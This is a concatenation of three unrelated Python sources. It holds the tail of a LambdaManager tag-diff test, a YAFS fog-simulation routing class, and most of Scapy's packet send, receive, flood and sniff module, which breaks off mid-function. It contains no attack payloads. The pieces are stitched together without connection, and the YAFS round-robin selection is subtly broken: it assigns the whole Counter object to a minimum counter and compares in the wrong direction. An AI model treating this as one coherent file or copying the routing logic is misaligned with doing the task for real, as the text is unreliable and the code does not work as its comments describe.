assert LambdaManager.diff_tags({"Foo": "Bar"}, {}) == ({}, ["Foo"])
def test_addition(self):
assert LambdaManager.diff_tags({}, {"Foo": "Bar"}) == ({"Foo": "Bar"}, [])
def test_update(self):
assert LambdaManager.diff_tags(
{"Foo": "Bar"}, {"Foo": "Baz"}) == ({"Foo": "Baz"}, [])
|
from yafs.selection import Selection
import networkx as nx
from collections import Counter
class DeviceSpeedAwareRouting(Selection):
def __init__(self):
self.cache = {}
self.counter = Counter(list())
self.invalid_cache_value = True
self.controlServices = {}
# key: a service
# value : a list of idDevices
super(DeviceSpeedAwareRouting, self).__init__()
def compute_BEST_DES(self, node_src, alloc_DES, sim, DES_dst,message):
try:
bestLong = float('inf')
minPath = []
bestDES = []
moreDES = []
#print len(DES_dst)
for dev in DES_dst:
node_dst = alloc_DES[dev]
path = list(nx.shortest_path(sim.topology.G, source=node_src, target=node_dst))
long = len(path)
if long < bestLong:
bestLong = long
minPath = path
bestDES = dev
moreDES = []
elif long == bestLong:
# Another instance service is deployed in the same node
if len(moreDES)==0:
moreDES.append(bestDES)
moreDES.append(dev)
# There are two or more options in a node: #ROUND ROBIN Schedule
if len(moreDES)>0:
### RETURN
bestValue = 0
minCounter = float('inf')
for idx,service in enumerate(moreDES):
if not service in self.counter:
return minPath, service
else:
if minCounter < self.counter[service]:
minCounter = self.counter
bestValue = idx
return minPath, moreDES[bestValue]
else:
return minPath, bestDES
except (nx.NetworkXNoPath, nx.NodeNotFound) as e:
self.logger.warning("There is no path between two nodes: %s - %s " % (node_src, node_dst))
# print("Simulation must ends?)"
return [], None
def get_path(self, sim, app_name, message, topology_src, alloc_DES, alloc_module, traffic, from_des):
node_src = topology_src #entity that sends the message
service = message.dst # Name of the service
DES_dst = alloc_module[app_name][message.dst] #module sw that can serve the message
#The number of nodes control the updating of the cache. If the number of nodes changes, the cache is totally cleaned.
path, des = self.compute_BEST_DES(node_src, alloc_DES, sim, DES_dst,message)
try:
dc = int(des)
self.counter[dc] += 1
self.controlServices[(node_src, service)] = (path, des)
except TypeError: # The node is not linked with other nodes
return [], None
return [path], [des]
def clear_routing_cache(self):
self.invalid_cache_value = False
self.cache = {}
self.counter = Counter(list())
self.controlServices = {}
def get_path_from_failure(self, sim, message, link, alloc_DES, alloc_module, traffic, ctime, from_des):
idx = message.path.index(link[0])
#print "IDX: ",idx
if idx == len(message.path):
# The node who serves ... not possible case
return [],[]
else:
node_src = message.path[idx] #In this point to the other entity the system fail
# print "SRC: ",node_src # 164
node_dst = message.path[len(message.path)-1]
# print "DST: ",node_dst #261
# print "INT: ",message.dst_int #301
path, des = self.get_path(sim,message.app_name,message,node_src,alloc_DES,alloc_module,traffic,from_des)
if len(path[0])>0:
# print path # [[164, 130, 380, 110, 216]]
# print des # [40]
concPath = message.path[0:message.path.index(path[0][0])] + path[0]
# print concPath # [86, 242, 160, 164, 130, 380, 110, 216]
newINT = node_src #path[0][2]
# print newINT # 380
message.dst_int = newINT
return [concPath], des
else:
return [],[]
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# This program is published under a GPLv2 license
"""
Functions to send and receive packets.
"""
from __future__ import absolute_import, print_function
import itertools
from threading import Thread, Event
import os
import re
import subprocess
import time
import types
from scapy.compat import plain_str
from scapy.data import ETH_P_ALL
from scapy.config import conf
from scapy.error import warning
from scapy.interfaces import (
network_name,
resolve_iface,
NetworkInterface,
)
from scapy.packet import Packet
from scapy.utils import get_temp_file, tcpdump, wrpcap, \
ContextManagerSubprocess, PcapReader
from scapy.plist import (
PacketList,
QueryAnswer,
SndRcvList,
)
from scapy.error import log_runtime, log_interactive, Scapy_Exception
from scapy.base_classes import Gen, SetGen
from scapy.modules import six
from scapy.modules.six.moves import map
from scapy.sessions import DefaultSession
from scapy.supersocket import SuperSocket, IterSocket
# Typing imports
from scapy.compat import (
Any,
Callable,
Dict,
Iterator,
List,
Optional,
Tuple,
Type,
Union,
cast
)
from scapy.interfaces import _GlobInterfaceType
from scapy.plist import _PacketIterable
if conf.route is None:
# unused import, only to initialize conf.route and conf.iface*
import scapy.route # noqa: F401
#################
# Debug class #
#################
class debug:
recv = PacketList([], "Received")
sent = PacketList([], "Sent")
match = SndRcvList([], "Matched")
crashed_on = None # type: Optional[Tuple[Type[Packet], bytes]]
####################
# Send / Receive #
####################
_DOC_SNDRCV_PARAMS = """
:param pks: SuperSocket instance to send/receive packets
:param pkt: the packet to send
:param rcv_pks: if set, will be used instead of pks to receive packets.
packets will still be sent through pks
:param nofilter: put 1 to avoid use of BPF filters
:param retry: if positive, how many times to resend unanswered packets
if negative, how many times to retry when no more packets
are answered
:param timeout: how much time to wait after the last packet has been sent
:param verbose: set verbosity level
:param multi: whether to accept multiple answers for the same stimulus
:param prebuild: pre-build the packets before starting to send them.
Automatically enabled when a generator is passed as the packet
"""
_GlobSessionType = Union[Type[DefaultSession], DefaultSession]
class SndRcvHandler(object):
"""
Util to send/receive packets, used by sr*().
Do not use directly.
This matches the requests and answers.
Notes::
- threaded mode: enabling threaded mode will likely
break packet timestamps, but might result in a speedup
when sending a big amount of packets. Disabled by default
- DEVS: store the outgoing timestamp right BEFORE sending the packet
to avoid races that could result in negative latency. We aren't Stadia
"""
def __init__(self,
pks, # type: SuperSocket
pkt, # type: _PacketIterable
timeout=None, # type: Optional[int]
inter=0, # type: int
verbose=None, # type: Optional[int]
chainCC=False, # type: bool
retry=0, # type: int
multi=False, # type: bool
rcv_pks=None, # type: Optional[SuperSocket]
prebuild=False, # type: bool
_flood=None, # type: Optional[Tuple[int, Callable[[], None]]] # noqa: E501
threaded=False, # type: bool
session=None # type: Optional[_GlobSessionType]
):
# type: (...) -> None
# Instantiate all arguments
if verbose is None:
verbose = conf.verb
if conf.debug_match:
debug.recv = PacketList([], "Received")
debug.sent = PacketList([], "Sent")
debug.match = SndRcvList([], "Matched")
self.nbrecv = 0
self.ans = [] # type: List[QueryAnswer]
self.pks = pks
self.rcv_pks = rcv_pks or pks
self.inter = inter
self.verbose = verbose
self.chainCC = chainCC
self.multi = multi
self.timeout = timeout
self.session = session
# Instantiate packet holders
if _flood:
self.tobesent = pkt # type: Union[_PacketIterable, SetGen[Packet]]
self.notans = _flood[0]
else:
if isinstance(pkt, types.GeneratorType) or prebuild:
self.tobesent = list(pkt)
self.notans = len(self.tobesent)
else:
self.tobesent = (
SetGen(pkt) if not isinstance(pkt, Gen) else pkt
)
self.notans = self.tobesent.__iterlen__()
if retry < 0:
autostop = retry = -retry
else:
autostop = 0
if timeout is not None and timeout < 0:
self.timeout = None
while retry >= 0:
self.hsent = {} # type: Dict[bytes, List[Packet]]
if threaded or _flood:
# Send packets in thread.
# https://github.com/secdev/scapy/issues/1791
snd_thread = Thread(
target=self._sndrcv_snd
)
snd_thread.setDaemon(True)
# Start routine with callback
self._sndrcv_rcv(snd_thread.start)
# Ended. Let's close gracefully
if _flood:
# Flood: stop send thread
_flood[1]()
snd_thread.join()
else:
self._sndrcv_rcv(self._sndrcv_snd)
if multi:
remain = [
p for p in itertools.chain(*six.itervalues(self.hsent))
if not hasattr(p, '_answered')
]
else:
remain = list(itertools.chain(*six.itervalues(self.hsent)))
if autostop and len(remain) > 0 and \
len(remain) != len(self.tobesent):
retry = autostop
self.tobesent = remain
if len(self.tobesent) == 0:
break
retry -= 1
if conf.debug_match:
debug.sent = PacketList(remain[:], "Sent")
debug.match = SndRcvList(self.ans[:])
# Clean the ans list to delete the field _answered
if multi:
for snd, _ in self.ans:
if hasattr(snd, '_answered'):
del snd._answered
if verbose:
print(
"\nReceived %i packets, got %i answers, "
"remaining %i packets" % (
self.nbrecv + len(self.ans), len(self.ans), self.notans
)
)
self.ans_result = SndRcvList(self.ans)
self.unans_result = PacketList(remain, "Unanswered")
def results(self):
# type: () -> Tuple[SndRcvList, PacketList]
return self.ans_result, self.unans_result
def _sndrcv_snd(self):
# type: () -> None
"""Function used in the sending thread of sndrcv()"""
try:
if self.verbose:
print("Begin emission:")
i = 0
for p in self.tobesent:
# Populate the dictionary of _sndrcv_rcv
# _sndrcv_rcv won't miss the answer of a packet that
# has not been sent
self.hsent.setdefault(p.hashret(), []).append(p)
# Send packet
self.pks.send(p)
time.sleep(self.inter)
i += 1
if self.verbose:
print("Finished sending %i packets." % i)
except SystemExit:
pass
except Exception:
log_runtime.exception("--- Error sending packets")
def _process_packet(self, r):
# type: (Packet) -> None
"""Internal function used to process each packet."""
if r is None:
return
ok = False
h = r.hashret()
if h in self.hsent:
hlst = self.hsent[h]
for i, sentpkt in enumerate(hlst):
if r.answers(sentpkt):
self.ans.append(QueryAnswer(sentpkt, r))
if self.verbose > 1:
os.write(1, b"*")
ok = True
if not self.multi:
del hlst[i]
self.notans -= 1
else:
if not hasattr(sentpkt, '_answered'):
self.notans -= 1
sentpkt._answered = 1
break
if self.notans <= 0 and not self.multi:
if self.sniffer:
self.sniffer.stop(join=False)
if not ok:
if self.verbose > 1:
os.write(1, b".")
self.nbrecv += 1
if conf.debug_match:
debug.recv.append(r)
def _sndrcv_rcv(self, callback):
# type: (Callable[[], None]) -> None
"""Function used to receive packets and check their hashret"""
self.sniffer = None # type: Optional[AsyncSniffer]
try:
self.sniffer = AsyncSniffer()
self.sniffer._run(
prn=self._process_packet,
timeout=self.timeout,
store=False,
opened_socket=self.rcv_pks,
session=self.session,
started_callback=callback
)
except KeyboardInterrupt:
if self.chainCC:
raise
def sndrcv(*args, **kwargs):
# type: (*Any, **Any) -> Tuple[SndRcvList, PacketList]
"""Scapy raw function to send a packet and receive its answer.
WARNING: This is an internal function. Using sr/srp/sr1/srp is
more appropriate in many cases.
"""
sndrcver = SndRcvHandler(*args, **kwargs)
return sndrcver.results()
def __gen_send(s, # type: SuperSocket
x, # type: _PacketIterable
inter=0, # type: int
loop=0, # type: int
count=None, # type: Optional[int]
verbose=None, # type: Optional[int]
realtime=False, # type: bool
return_packets=False, # type: bool
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Optional[PacketList]
"""
An internal function used by send/sendp to actually send the packets,
implement the send logic...
It will take care of iterating through the different packets
"""
if isinstance(x, str):
x = conf.raw_layer(load=x)
if not isinstance(x, Gen):
x = SetGen(x)
if verbose is None:
verbose = conf.verb
n = 0
if count is not None:
loop = -count
elif not loop:
loop = -1
if return_packets:
sent_packets = PacketList()
try:
while loop:
dt0 = None
for p in x:
if realtime:
ct = time.time()
if dt0:
st = dt0 + float(p.time) - ct
if st > 0:
time.sleep(st)
else:
dt0 = ct - float(p.time)
s.send(p)
if return_packets:
sent_packets.append(p)
n += 1
if verbose:
os.write(1, b".")
time.sleep(inter)
if loop < 0:
loop += 1
except KeyboardInterrupt:
pass
if verbose:
print("\nSent %i packets." % n)
if return_packets:
return sent_packets
return None
def _send(x, # type: _PacketIterable
_func, # type: Callable[[NetworkInterface], Type[SuperSocket]]
inter=0, # type: int
loop=0, # type: int
iface=None, # type: Optional[_GlobInterfaceType]
count=None, # type: Optional[int]
verbose=None, # type: Optional[int]
realtime=False, # type: bool
return_packets=False, # type: bool
socket=None, # type: Optional[SuperSocket]
**kargs # type: Any
):
# type: (...) -> Optional[PacketList]
"""Internal function used by send and sendp"""
need_closing = socket is None
iface = resolve_iface(iface or conf.iface)
socket = socket or _func(iface)(iface=iface, **kargs)
results = __gen_send(socket, x, inter=inter, loop=loop,
count=count, verbose=verbose,
realtime=realtime, return_packets=return_packets)
if need_closing:
socket.close()
return results
@conf.commands.register
def send(x, # type: _PacketIterable
iface=None, # type: Optional[_GlobInterfaceType]
**kargs # type: Any
):
# type: (...) -> Optional[PacketList]
"""
Send packets at layer 3
:param x: the packets
:param inter: time (in s) between two packets (default 0)
:param loop: send packet indefinetly (default 0)
:param count: number of packets to send (default None=1)
:param verbose: verbose mode (default None=conf.verbose)
:param realtime: check that a packet was sent before sending the next one
:param return_packets: return the sent packets
:param socket: the socket to use (default is conf.L3socket(kargs))
:param iface: the interface to send the packets on
:param monitor: (not on linux) send in monitor mode
:returns: None
"""
iface = _interface_selection(iface, x)
return _send(
x,
lambda iface: iface.l3socket(),
iface=iface,
**kargs
)
@conf.commands.register
def sendp(x, # type: _PacketIterable
iface=None, # type: Optional[_GlobInterfaceType]
iface_hint=None, # type: Optional[str]
socket=None, # type: Optional[SuperSocket]
**kargs # type: Any
):
# type: (...) -> Optional[PacketList]
"""
Send packets at layer 2
:param x: the packets
:param inter: time (in s) between two packets (default 0)
:param loop: send packet indefinetly (default 0)
:param count: number of packets to send (default None=1)
:param verbose: verbose mode (default None=conf.verbose)
:param realtime: check that a packet was sent before sending the next one
:param return_packets: return the sent packets
:param socket: the socket to use (default is conf.L3socket(kargs))
:param iface: the interface to send the packets on
:param monitor: (not on linux) send in monitor mode
:returns: None
"""
if iface is None and iface_hint is not None and socket is None:
iface = conf.route.route(iface_hint)[0]
return _send(
x,
lambda iface: iface.l2socket(),
iface=iface,
socket=socket,
**kargs
)
@conf.commands.register
def sendpfast(x, # type: _PacketIterable
pps=None, # type: Optional[float]
mbps=None, # type: Optional[float]
realtime=False, # type: bool
loop=0, # type: int
file_cache=False, # type: bool
iface=None, # type: Optional[_GlobInterfaceType]
replay_args=None, # type: Optional[List[str]]
parse_results=False, # type: bool
):
# type: (...) -> Optional[Dict[str, Any]]
"""Send packets at layer 2 using tcpreplay for performance
:param pps: packets per second
:param mpbs: MBits per second
:param realtime: use packet's timestamp, bending time with real-time value
:param loop: number of times to process the packet list
:param file_cache: cache packets in RAM instead of reading from
disk at each iteration
:param iface: output interface
:param replay_args: List of additional tcpreplay args (List[str])
:param parse_results: Return a dictionary of information
outputted by tcpreplay (default=False)
:returns: stdout, stderr, command used
"""
if iface is None:
iface = conf.iface
argv = [conf.prog.tcpreplay, "--intf1=%s" % network_name(iface)]
if pps is not None:
argv.append("--pps=%i" % pps)
elif mbps is not None:
argv.append("--mbps=%f" % mbps)
elif realtime is not None:
argv.append("--multiplier=%f" % realtime)
else:
argv.append("--topspeed")
if loop:
argv.append("--loop=%i" % loop)
if file_cache:
argv.append("--preload-pcap")
# Check for any additional args we didn't cover.
if replay_args is not None:
argv.extend(replay_args)
f = get_temp_file()
argv.append(f)
wrpcap(f, x)
results = None
with ContextManagerSubprocess(conf.prog.tcpreplay):
try:
cmd = subprocess.Popen(argv, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except KeyboardInterrupt:
log_interactive.info("Interrupted by user")
except Exception:
os.unlink(f)
raise
else:
stdout, stderr = cmd.communicate()
if stderr:
log_runtime.warning(stderr.decode())
if parse_results:
results = _parse_tcpreplay_result(stdout, stderr, argv)
elif conf.verb > 2:
log_runtime.info(stdout.decode())
os.unlink(f)
return results
def _parse_tcpreplay_result(stdout_b, stderr_b, argv):
# type: (bytes, bytes, List[str]) -> Dict[str, Any]
"""
Parse the output of tcpreplay and modify the results_dict to populate output information. # noqa: E501
Tested with tcpreplay v3.4.4
Tested with tcpreplay v4.1.2
:param stdout: stdout of tcpreplay subprocess call
:param stderr: stderr of tcpreplay subprocess call
:param argv: the command used in the subprocess call
:return: dictionary containing the results
"""
try:
results = {}
stdout = plain_str(stdout_b).lower()
stderr = plain_str(stderr_b).strip().split("\n")
elements = {
"actual": (int, int, float),
"rated": (float, float, float),
"flows": (int, float, int, int),
"attempted": (int,),
"successful": (int,),
"failed": (int,),
"truncated": (int,),
"retried packets (eno": (int,),
"retried packets (eag": (int,),
}
multi = {
"actual": ("packets", "bytes", "time"),
"rated": ("bps", "mbps", "pps"),
"flows": ("flows", "fps", "flow_packets", "non_flow"),
"retried packets (eno": ("retried_enobufs",),
"retried packets (eag": ("retried_eagain",),
}
float_reg = r"([0-9]*\.[0-9]+|[0-9]+)"
int_reg = r"([0-9]+)"
any_reg = r"[^0-9]*"
r_types = {int: int_reg, float: float_reg}
for line in stdout.split("\n"):
line = line.strip()
for elt, _types in elements.items():
if line.startswith(elt):
regex = any_reg.join([r_types[x] for x in _types])
matches = re.search(regex, line)
for i, typ in enumerate(_types):
name = multi.get(elt, [elt])[i]
if matches:
results[name] = typ(matches.group(i + 1))
results["command"] = " ".join(argv)
results["warnings"] = stderr[:-1]
return results
except Exception as parse_exception:
if not conf.interactive:
raise
log_runtime.error("Error parsing output: %s", parse_exception)
return {}
@conf.commands.register
def sr(x, # type: _PacketIterable
promisc=None, # type: Optional[bool]
filter=None, # type: Optional[str]
iface=None, # type: Optional[_GlobInterfaceType]
nofilter=0, # type: int
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Tuple[SndRcvList, PacketList]
"""
Send and receive packets at layer 3
"""
s = conf.L3socket(promisc=promisc, filter=filter,
iface=iface, nofilter=nofilter)
result = sndrcv(s, x, *args, **kargs)
s.close()
return result
def _interface_selection(iface, # type: Optional[_GlobInterfaceType]
packet # type: _PacketIterable
):
# type: (...) -> _GlobInterfaceType
"""
Select the network interface according to the layer 3 destination
"""
if iface is None:
try:
iff = next(packet.__iter__()).route()[0]
except AttributeError:
iff = None
return iff or conf.iface
return iface
@conf.commands.register
def sr1(x, # type: _PacketIterable
promisc=None, # type: Optional[bool]
filter=None, # type: Optional[str]
iface=None, # type: Optional[_GlobInterfaceType]
nofilter=0, # type: int
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Optional[Packet]
"""
Send packets at layer 3 and return only the first answer
"""
iface = _interface_selection(iface, x)
s = conf.L3socket(promisc=promisc, filter=filter,
nofilter=nofilter, iface=iface)
ans, _ = sndrcv(s, x, *args, **kargs)
s.close()
if len(ans) > 0:
return cast(Packet, ans[0][1])
return None
@conf.commands.register
def srp(x, # type: Packet
promisc=None, # type: Optional[bool]
iface=None, # type: Optional[_GlobInterfaceType]
iface_hint=None, # type: Optional[str]
filter=None, # type: Optional[str]
nofilter=0, # type: int
type=ETH_P_ALL, # type: int
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Tuple[SndRcvList, PacketList]
"""
Send and receive packets at layer 2
"""
if iface is None and iface_hint is not None:
iface = conf.route.route(iface_hint)[0]
iface = resolve_iface(iface or conf.iface)
s = iface.l2socket()(promisc=promisc, iface=iface,
filter=filter, nofilter=nofilter, type=type)
result = sndrcv(s, x, *args, **kargs)
s.close()
return result
@conf.commands.register
def srp1(*args, **kargs):
# type: (*Packet, **Any) -> Optional[Packet]
"""
Send and receive packets at layer 2 and return only the first answer
"""
ans, _ = srp(*args, **kargs)
if len(ans) > 0:
return cast(Packet, ans[0][1])
return None
# Append doc
for sr_func in [srp, srp1, sr, sr1]:
if sr_func.__doc__ is not None:
sr_func.__doc__ += _DOC_SNDRCV_PARAMS
# SEND/RECV LOOP METHODS
def __sr_loop(srfunc, # type: Callable[..., Tuple[SndRcvList, PacketList]]
pkts, # type: _PacketIterable
prn=lambda x: x[1].summary(), # type: Callable[[QueryAnswer], Any] # noqa: E501
prnfail=lambda x: x.summary(), # type: Callable[[Packet], Any]
inter=1, # type: int
timeout=None, # type: Optional[int]
count=None, # type: Optional[int]
verbose=None, # type: Optional[int]
store=1, # type: int
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Tuple[SndRcvList, PacketList]
n = 0
r = 0
ct = conf.color_theme
if verbose is None:
verbose = conf.verb
parity = 0
ans = [] # type: List[QueryAnswer]
unans = [] # type: List[Packet]
if timeout is None:
timeout = min(2 * inter, 5)
try:
while True:
parity ^= 1
col = [ct.even, ct.odd][parity]
if count is not None:
if count == 0:
break
count -= 1
start = time.time()
if verbose > 1:
print("\rsend...\r", end=' ')
res = srfunc(pkts, timeout=timeout, verbose=0, chainCC=True, *args, **kargs) # noqa: E501
n += len(res[0]) + len(res[1])
r += len(res[0])
if verbose > 1 and prn and len(res[0]) > 0:
msg = "RECV %i:" % len(res[0])
print("\r" + ct.success(msg), end=' ')
for p in res[0]:
print(col(prn(p)))
print(" " * len(msg), end=' ')
if verbose > 1 and prnfail and len(res[1]) > 0:
msg = "fail %i:" % len(res[1])
print("\r" + ct.fail(msg), end=' ')
for p in res[1]:
print(col(prnfail(p)))
print(" " * len(msg), end=' ')
if verbose > 1 and not (prn or prnfail):
print("recv:%i fail:%i" % tuple(map(len, res[:2])))
if store:
ans += res[0]
unans += res[1]
end = time.time()
if end - start < inter:
time.sleep(inter + start - end)
except KeyboardInterrupt:
pass
if verbose and n > 0:
print(ct.normal("\nSent %i packets, received %i packets. %3.1f%% hits." % (n, r, 100.0 * r / n))) # noqa: E501
return SndRcvList(ans), PacketList(unans)
@conf.commands.register
def srloop(pkts, # type: _PacketIterable
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Tuple[SndRcvList, PacketList]
"""
Send a packet at layer 3 in loop and print the answer each time
srloop(pkts, [prn], [inter], [count], ...) --> None
"""
return __sr_loop(sr, pkts, *args, **kargs)
@conf.commands.register
def srploop(pkts, # type: _PacketIterable
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Tuple[SndRcvList, PacketList]
"""
Send a packet at layer 2 in loop and print the answer each time
srloop(pkts, [prn], [inter], [count], ...) --> None
"""
return __sr_loop(srp, pkts, *args, **kargs)
# SEND/RECV FLOOD METHODS
def sndrcvflood(pks, # type: SuperSocket
pkt, # type: _PacketIterable
inter=0, # type: int
verbose=None, # type: Optional[int]
chainCC=False, # type: bool
timeout=None # type: Optional[int]
):
# type: (...) -> Tuple[SndRcvList, PacketList]
"""sndrcv equivalent for flooding."""
stopevent = Event()
def send_in_loop(tobesent, stopevent):
# type: (_PacketIterable, Event) -> Iterator[Packet]
"""Infinite generator that produces the same
packet until stopevent is triggered."""
while True:
for p in tobesent:
if stopevent.is_set():
return
yield p
infinite_gen = send_in_loop(pkt, stopevent)
_flood_len = pkt.__iterlen__() if isinstance(pkt, Gen) else len(pkt)
_flood = [_flood_len, stopevent.set]
return sndrcv(
pks, infinite_gen,
inter=inter, verbose=verbose,
chainCC=chainCC, timeout=timeout,
_flood=_flood
)
@conf.commands.register
def srflood(x, # type: _PacketIterable
promisc=None, # type: Optional[bool]
filter=None, # type: Optional[str]
iface=None, # type: Optional[_GlobInterfaceType]
nofilter=None, # type: Optional[bool]
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Tuple[SndRcvList, PacketList]
"""Flood and receive packets at layer 3
:param prn: function applied to packets received
:param unique: only consider packets whose print
:param nofilter: put 1 to avoid use of BPF filters
:param filter: provide a BPF filter
:param iface: listen answers only on the given interface
"""
iface = resolve_iface(iface or conf.iface)
s = iface.l3socket()(promisc=promisc, filter=filter, iface=iface, nofilter=nofilter) # noqa: E501
r = sndrcvflood(s, x, *args, **kargs)
s.close()
return r
@conf.commands.register
def sr1flood(x, # type: _PacketIterable
promisc=None, # type: Optional[bool]
filter=None, # type: Optional[str]
iface=None, # type: Optional[_GlobInterfaceType]
nofilter=0, # type: int
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Optional[Packet]
"""Flood and receive packets at layer 3 and return only the first answer
:param prn: function applied to packets received
:param verbose: set verbosity level
:param nofilter: put 1 to avoid use of BPF filters
:param filter: provide a BPF filter
:param iface: listen answers only on the given interface
"""
iface = resolve_iface(iface or conf.iface)
s = iface.l3socket()(promisc=promisc, filter=filter, nofilter=nofilter, iface=iface) # noqa: E501
ans, _ = sndrcvflood(s, x, *args, **kargs)
s.close()
if len(ans) > 0:
return cast(Packet, ans[0][1])
return None
@conf.commands.register
def srpflood(x, # type: _PacketIterable
promisc=None, # type: Optional[bool]
filter=None, # type: Optional[str]
iface=None, # type: Optional[_GlobInterfaceType]
iface_hint=None, # type: Optional[str]
nofilter=None, # type: Optional[bool]
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Tuple[SndRcvList, PacketList]
"""Flood and receive packets at layer 2
:param prn: function applied to packets received
:param unique: only consider packets whose print
:param nofilter: put 1 to avoid use of BPF filters
:param filter: provide a BPF filter
:param iface: listen answers only on the given interface
"""
if iface is None and iface_hint is not None:
iface = conf.route.route(iface_hint)[0]
iface = resolve_iface(iface or conf.iface)
s = iface.l2socket()(promisc=promisc, filter=filter, iface=iface, nofilter=nofilter) # noqa: E501
r = sndrcvflood(s, x, *args, **kargs)
s.close()
return r
@conf.commands.register
def srp1flood(x, # type: _PacketIterable
promisc=None, # type: Optional[bool]
filter=None, # type: Optional[str]
iface=None, # type: Optional[_GlobInterfaceType]
nofilter=0, # type: int
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> Optional[Packet]
"""Flood and receive packets at layer 2 and return only the first answer
:param prn: function applied to packets received
:param verbose: set verbosity level
:param nofilter: put 1 to avoid use of BPF filters
:param filter: provide a BPF filter
:param iface: listen answers only on the given interface
"""
iface = resolve_iface(iface or conf.iface)
s = iface.l2socket()(promisc=promisc, filter=filter, nofilter=nofilter, iface=iface) # noqa: E501
ans, _ = sndrcvflood(s, x, *args, **kargs)
s.close()
if len(ans) > 0:
return cast(Packet, ans[0][1])
return None
# SNIFF METHODS
class AsyncSniffer(object):
"""
Sniff packets and return a list of packets.
Args:
count: number of packets to capture. 0 means infinity.
store: whether to store sniffed packets or discard them
prn: function to apply to each packet. If something is returned, it
is displayed.
--Ex: prn = lambda x: x.summary()
session: a session = a flow decoder used to handle stream of packets.
--Ex: session=TCPSession
See below for more details.
filter: BPF filter to apply.
lfilter: Python function applied to each packet to determine if
further action may be done.
--Ex: lfilter = lambda x: x.haslayer(Padding)
offline: PCAP file (or list of PCAP files) to read packets from,
instead of sniffing them
quiet: when set to True, the process stderr is discarded
(default: False).
timeout: stop sniffing after a given time (default: None).
L2socket: use the provided L2socket (default: use conf.L2listen).
opened_socket: provide an object (or a list of objects) ready to use
.recv() on.
stop_filter: Python function applied to each packet to determine if
we have to stop the capture after this packet.
--Ex: stop_filter = lambda x: x.haslayer(TCP)
iface: interface or list of interfaces (default: None for sniffing
on all interfaces).
monitor: use monitor mode. May not be available on all OS
started_callback: called as soon as the sniffer starts sniffing
(default: None).
The iface, offline and opened_socket parameters can be either an
element, a list of elements, or a dict object mapping an element to a
label (see examples below).
For more information about the session argument, see
https://scapy.rtfd.io/en/latest/usage.html#advanced-sniffing-sniffing-sessions
Examples: synchronous
>>> sniff(filter="arp")
>>> sniff(filter="tcp",
... session=IPSession, # defragment on-the-flow
... prn=lambda x: x.summary())
>>> sniff(lfilter=lambda pkt: ARP in pkt)
>>> sniff(iface="eth0", prn=Packet.summary)
>>> sniff(iface=["eth0", "mon0"],
... prn=lambda pkt: "%s: %s" % (pkt.sniffed_on,
... pkt.summary()))
>>> sniff(iface={"eth0": "Ethernet", "mon0": "Wifi"},
... prn=lambda pkt: "%s: %s" % (pkt.sniffed_on,
... pkt.summary()))
Examples: asynchronous
>>> t = AsyncSniffer(iface="enp0s3")
>>> t.start()
>>> time.sleep(1)
>>> print("nice weather today")
>>> t.stop()
"""
def __init__(self, *args, **kwargs):
# type: (*Any, **Any) -> None
# Store keyword arguments
self.args = args
self.kwargs = kwargs
self.running = False
self.thread = None # type: Optional[Thread]
self.results = None # type: Optional[PacketList]
def _setup_thread(self):
# type: () -> None
# Prepare sniffing thread
self.thread = Thread(
target=self._run,
args=self.args,
kwargs=self.kwargs,
name="AsyncSniffer"
)
self.thread.setDaemon(True)
def _run(self,
count=0, # type: int
store=True, # type: bool
offline=None, # type: Any
quiet=False, # type: bool
prn=None, # type: Optional[Callable[[Packet], Any]]
lfilter=None, # type: Optional[Callable[[Packet], bool]]
L2socket=None, # type: Optional[Type[SuperSocket]]
timeout=None, # type: Optional[int]
opened_socket=None, # type: Optional[SuperSocket]
stop_filter=None, # type: Optional[Callable[[Packet], bool]]
iface=None, # type: Optional[_GlobInterfaceType]
started_callback=None, # type: Optional[Callable[[], Any]]
session=None, # type: Optional[_GlobSessionType]
session_kwargs={}, # type: Dict[str, Any]
**karg # type: Any
):
# type: (...) -> None
self.running = True
# Start main thread
# instantiate session
if not isinstance(session, DefaultSession):
session = session or DefaultSession
session = session(prn=prn, store=store,
**session_kwargs)
else:
session.prn = prn
session.store = store
# sniff_sockets follows: {socket: label}
sniff_sockets = {} # type: Dict[SuperSocket, _GlobInterfaceType]
if opened_socket is not None:
if isinstance(opened_socket, list):
sniff_sockets.update(
(s, "socket%d" % i)
for i, s in enumerate(opened_socket)
)
elif isinstance(opened_socket, dict):
sniff_sockets.update(
(s, label)
for s, label in six.iteritems(opened_socket)
)
else:
sniff_sockets[opened_socket] = "socket0"
if offline is not None:
flt = karg.get('filter')
if isinstance(offline, str):
# Single file
offline = [offline]
if isinstance(offline, list) and \
all(isinstance(elt, str) for elt in offline):
# List of files
sniff_sockets.update((PcapReader(
fname if flt is None else
tcpdump(fname,
args=["-w", "-"],
flt=flt,
getfd=True,
quiet=quiet)
), fname) for fname in offline)
elif isinstance(offline, dict):
# Dict of files
sniff_sockets.update((PcapReader(
fname if flt is None else
tcpdump(fname,
args=["-w", "-"],
flt=flt,
getfd=True,
quiet=quiet)
), label) for fname, label in six.iteritems(offline))
elif isinstance(offline, (Packet, PacketList, list)):
# Iterables (list of packets, PacketList..)
offline = IterSocket(offline)
sniff_sockets[offline if flt is None else PcapReader(
tcpdump(offline,
args=["-w", "-"],
flt=flt,
getfd=True,
quiet=quiet)
)] = offline
else:
# Other (file descriptors...)
sniff_sockets[PcapReader(
offline if flt is None else
tcpdump(offline,
args=["-w", "-"],
flt=flt,
getfd=True,
quiet=quiet)
)] = offline
if not sniff_sockets or iface is not None:
iface = resolve_iface(iface or conf.iface)
if L2socket is None:
L2socket = iface.l2listen()
if isinstance(iface, list):
sniff_sockets.update(
(L2socket(type=ETH_P_ALL, iface=ifname, **karg),
ifname)
for ifname in iface
)
elif isinstance(iface, dict):
sniff_sockets.update(
(L2socket(type=ETH_P_ALL, iface=ifname, **karg),
iflabel)
for ifname, iflabel in six.iteritems(iface)
)
else:
